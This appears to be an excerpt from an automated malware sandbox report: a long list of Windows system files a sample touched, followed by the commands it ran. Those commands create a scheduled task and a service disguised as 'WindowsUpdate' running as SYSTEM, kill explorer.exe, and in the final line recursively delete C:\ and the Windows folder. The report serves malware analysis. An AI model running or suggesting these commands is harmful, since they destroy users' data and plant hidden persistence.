- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\windows-legacy-whql.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows7SP1-KB976933~31bf3856ad364e35~amd64~~6.1.0.17514.cat
- <SYSTEM32>\wbem\autorecover\4a01e0f376b5833eba98f0d1d5f60cd1.mof
- <SYSTEM32>\wbem\autorecover\4a6c97593254f1f3814bc80da94cc3ff.mof
- <SYSTEM32>\wbem\autorecover\4b3b0b9371e89215c02d5e6bef817802.mof
- <SYSTEM32>\wbem\autorecover\4bd7d1e946d925ef310a69910840a70e.mof
- <SYSTEM32>\wbem\autorecover\4c2d87bf8c6db49f83736d5c387ad621.mof
- <SYSTEM32>\wbem\autorecover\4d374dd0f81ff046b44b1abaa1e25b1e.mof
- <SYSTEM32>\wbem\autorecover\4d63dbc2e2f583689fbd5757de239e05.mof
- <SYSTEM32>\wbem\autorecover\4d68770b4a009d50cde66bb68b99dec7.mof
- <SYSTEM32>\wbem\autorecover\50687b7661b429cce2d0b5b045376885.mof
- <SYSTEM32>\wbem\autorecover\508bedd852152ba4e56354ba9b0dc4f7.mof
- <SYSTEM32>\wbem\autorecover\50a61596e5c5ece8862eae9a241e4d56.mof
- <SYSTEM32>\wbem\autorecover\518c51c612f4af81e609ec0d5cf027e1.mof
- <SYSTEM32>\wbem\autorecover\542dc56d520fddeda279a0d2f398203d.mof
- <SYSTEM32>\wbem\autorecover\554325d7e7839b4556d2a5f20944e003.mof
- <SYSTEM32>\wbem\autorecover\5561ccdc47bdbab27d8abeb9dca0e973.mof
- <SYSTEM32>\wbem\autorecover\56110eee7f067a75407d9f58f62f7e1d.mof
- <SYSTEM32>\wbem\autorecover\5632459bea939e7664b5e9db573e0658.mof
- <SYSTEM32>\wbem\autorecover\56670684ec21cf0599147bc0bf5ec059.mof
- <SYSTEM32>\wbem\autorecover\57b0d59999df0a672e8cdb1626320ac0.mof
- <SYSTEM32>\wbem\autorecover\5948c55d49e6e99fa494d64640631519.mof
- <SYSTEM32>\wbem\autorecover\5966d45c7b25eaca46e87dd8e5703964.mof
- <SYSTEM32>\wbem\autorecover\5a45131d6d76c102562b5ea59fa38fe3.mof
- <SYSTEM32>\wbem\autorecover\5b5d21cf62e70bacf9d085e6aa6ce143.mof
- <SYSTEM32>\wbem\autorecover\5bb8eb4b16b59e6bca8e2efaf09854b9.mof
- <SYSTEM32>\wbem\autorecover\5c44553017efb96f318fc977846142a4.mof
- <SYSTEM32>\wbem\autorecover\5c5ed8d28e446612e293ce03c6d905d1.mof
- <SYSTEM32>\wbem\autorecover\5fe81f25d4d51d8c38065e285f42f0bf.mof
- <SYSTEM32>\wbem\autorecover\612a6bcff9b18e7de6e34ce1d0d1e373.mof
- <SYSTEM32>\wbem\autorecover\614a80f671f7b5294a2b8ab09e9266a3.mof
- <SYSTEM32>\wbem\autorecover\619d36d623031b7aff224114d43e2f95.mof
- <SYSTEM32>\wbem\autorecover\61dfeb25b5a18c162a8f1ecb19a04bf2.mof
- <SYSTEM32>\wbem\autorecover\6317f4b515bd547512ff3ae3acd81242.mof
- <SYSTEM32>\wbem\autorecover\6318dce4d364c881f0f4dbc5ff76e093.mof
- <SYSTEM32>\wbem\autorecover\63376940b0ebc01daac83263174453fd.mof
- <SYSTEM32>\wbem\autorecover\6363bd0e4425b6da09542ea86e4433af.mof
- <SYSTEM32>\wbem\autorecover\64b9ca5d02571c3a5d29106d06c491dc.mof
- <SYSTEM32>\wbem\autorecover\66779b2d4ffa2c74bc0ede797594f286.mof
- <SYSTEM32>\wbem\autorecover\66fdc0ba5f9853accd969938a5fa9eb3.mof
- <SYSTEM32>\wbem\autorecover\678769af7343b5ac46f8bb18e5156f2d.mof
- <SYSTEM32>\wbem\autorecover\6792fda793556851bd20ea3dd8bd4f6b.mof
- <SYSTEM32>\wbem\autorecover\690bd80ae2dee5e3fba4442c95b7c5b1.mof
- <SYSTEM32>\wbem\autorecover\69abc7263a8d87a71b8ccc639c3320ad.mof
- <SYSTEM32>\wbem\autorecover\6b4556def3965f8a11caffe40132fee0.mof
- <SYSTEM32>\wbem\autorecover\6b94e1a22e5344ebe93874962d8ab589.mof
- <SYSTEM32>\wbem\autorecover\6bdef683b82e5489a76088ca76ff0d96.mof
- <SYSTEM32>\wbem\autorecover\6c2d826879feb554e7702b0063f795e0.mof
- <SYSTEM32>\wbem\autorecover\6c545b19d96d68b86ad0f69c750adf0a.mof
- <SYSTEM32>\wbem\autorecover\6cafd8a442f85abaae3739405d2c7a54.mof
- <SYSTEM32>\wbem\autorecover\6e2b4924e9d34307186d91b06413139c.mof
- <SYSTEM32>\wbem\autorecover\6eb9380fff24d934608fbb75f4c2a039.mof
- <SYSTEM32>\wbem\autorecover\6f09c6fb03c02f6e4834d78c451f4681.mof
- <SYSTEM32>\wbem\autorecover\6f8564a71977ae6b940705dcc4847a8d.mof
- <SYSTEM32>\wbem\autorecover\6f91ef98b3b112ec042c3dbc11d60a12.mof
- <SYSTEM32>\wbem\autorecover\6fff7467a5b40765d5740a413ca8bb8a.mof
- <SYSTEM32>\wbem\autorecover\7073ebb8e2f3c70e0fa1f650b7dea970.mof
- <SYSTEM32>\wbem\autorecover\711938bc749fb73b87eb98a55d4ab442.mof
- <SYSTEM32>\wbem\autorecover\712d9af633c252518ec610361183ded6.mof
- <SYSTEM32>\wbem\autorecover\713a7a07c9812cab47a78df6d3e000c5.mof
- <SYSTEM32>\wbem\autorecover\716fdc254e211f547a560e1a71d0e6ca.mof
- <SYSTEM32>\wbem\autorecover\71ace8168f1c0befd4582a15e6686934.mof
- <SYSTEM32>\wbem\autorecover\72f867ef62976ce9f70993ff3e68a4eb.mof
- <SYSTEM32>\wbem\autorecover\7356b60a38e81182a3770d69338c29dd.mof
- <SYSTEM32>\wbem\autorecover\73798c03e4de5fdcf5194ada9ebfb859.mof
- <SYSTEM32>\wbem\autorecover\74fa6eb0e3cbc72b17294cde9908a104.mof
- <SYSTEM32>\wbem\autorecover\75054c3771df289038069a9bb1c1fb6e.mof
- <SYSTEM32>\wbem\autorecover\7519df5a88b4a3b9f6c7b02a35072178.mof
- <SYSTEM32>\wbem\autorecover\76a0893587e3b7b36cd581d72babc344.mof
- <SYSTEM32>\wbem\autorecover\779e080b33f322115205bb50f1e0b8d1.mof
- <SYSTEM32>\wbem\autorecover\77af494807bb41a0b4b67aeec51f85c6.mof
- <SYSTEM32>\wbem\autorecover\78267b22eac78dc3c4997e8c91df1855.mof
- <SYSTEM32>\wbem\autorecover\786ead05832db44965a588b18eeb1f2c.mof
- <SYSTEM32>\wbem\autorecover\794db5afcbf854da94f3dbb7fce5e619.mof
- <SYSTEM32>\wbem\autorecover\7a6846672100b55caa717a6244792748.mof
- ClassName: '' WindowName: ''
- '%WINDIR%\cm.exe' /c ta.exe /f /im explorer.exe /t
- '%WINDIR%\ta.exe' /f /im explorer.exe /t
- '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "WindowsUpdate" /tr "<Full path to file>" /sc onlogon /ru SYSTEM /f
- '<SYSTEM32>\schtasks.exe' /create /tn "WindowsUpdate" /tr "<Full path to file>" /sc onlogon /ru SYSTEM /f
- '<SYSTEM32>\cmd.exe' /c sc create WindowsUpdate binPath= "<Full path to file>" start= auto
- '<SYSTEM32>\sc.exe' create WindowsUpdate binPath= "<Full path to file>" start= auto
- '<SYSTEM32>\wbem\wmic.exe' process where name="explorer.exe" delete
- '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "WindowsUpdate" /tr "<Full path to file>" /sc onlogon /ru SYSTEM /f' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c sc create WindowsUpdate binPath= "<Full path to file>" start= auto' (with hidden window)
- '<SYSTEM32>\wbem\wmic.exe' process where name="explorer.exe" delete' (with hidden window)
- '%WINDIR%\cm.exe' /c ta.exe /f /im explorer.exe /t' (with hidden window)
- '%WINDIR%\minsudo.exe' /NoL /TI /P "rd /s /q C:\ && rd /s /q %WINDIR%"' (with hidden window)